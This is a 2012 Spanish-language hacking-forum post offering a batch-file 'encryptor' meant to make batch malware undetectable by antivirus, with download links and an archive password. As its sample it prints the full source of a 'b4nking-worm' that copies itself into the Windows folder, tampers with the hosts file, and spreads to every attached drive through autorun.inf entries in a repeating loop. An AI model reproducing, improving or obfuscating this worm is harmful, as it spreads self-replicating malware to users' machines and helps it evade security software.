elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: [1]
1  Programación / Scripting / [BATCH]hackxcrack batch encriptador en: 30 Julio 2012, 19:54 pm
hola amigos de elhacker aca les traigo una tool que hize para un foro amigo de hackxcrack es un encriptador que les deja a su malware en batch indetectable a los avs





el gusano

antes
Código:
@echo off
::         + [ b4nking-worm ] +        
:: www.aztekmindz.org octalh@gmail.com  
::   – Generador Gusano bancario –      
COPY %0 "C:\WINDOWS\r@mbyte.bat"
SET htxt=C:\WINDOWS\system32\drivers\etc\hosts
IF EXIST %htxt% (
echo # [+]====[ b4nking w0rm by octalh ]====[+] >>%htxt%
echo # [+]====[ b4nking w0rm by octalh ]====[+] >>%htxt%
)
IPCONFIG /FLUSHDNS
:INICIO
FOR %%A IN (D F G H I J K L M N O P Q R S T U V W X Y Z) DO CALL :VERFICAR %%A  
GOTO :EOF
:VERFICAR
IF EXIST "%1:" (CALL :COPIADO %1)
GOTO :EOF  
:COPIADO  
COPY r@mbyte.bat "%1:\145782.bat"
echo [autorun] > "%1:\autorun.inf"
echo shell\1=abrir >>":\autorun.inf"
echo shell\1\Command="r@mbyte.bat" >>"%1:\autorun.inf"
echo shell\2=explorar >>"%1:\autorun.inf"
echo shell\2\Command="r@mbyte.bat" >>"%1:\autorun.inf"
echo shellexecute= "\r@mbyte.bat" >>"%1:\autorun.inf"
ping -n 10 localhost
GOTO :INICIO

y el cifrado
http://pastebin.com/KbiMGdPv


thanks
July(por los iconos) ,kr34t0r(por las imagenes) y mrobles(por su manual que me sirvio de inspiracion para hacer la tool)

nuevo link http://www.mediafire.com/download.php?lcebfl7n86t2ce2
Pass:H@ckXcr@ck


dudas y sugerencias bienvenidas
PD:pequeño bug de la ocx arreglada saludos!  :)
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines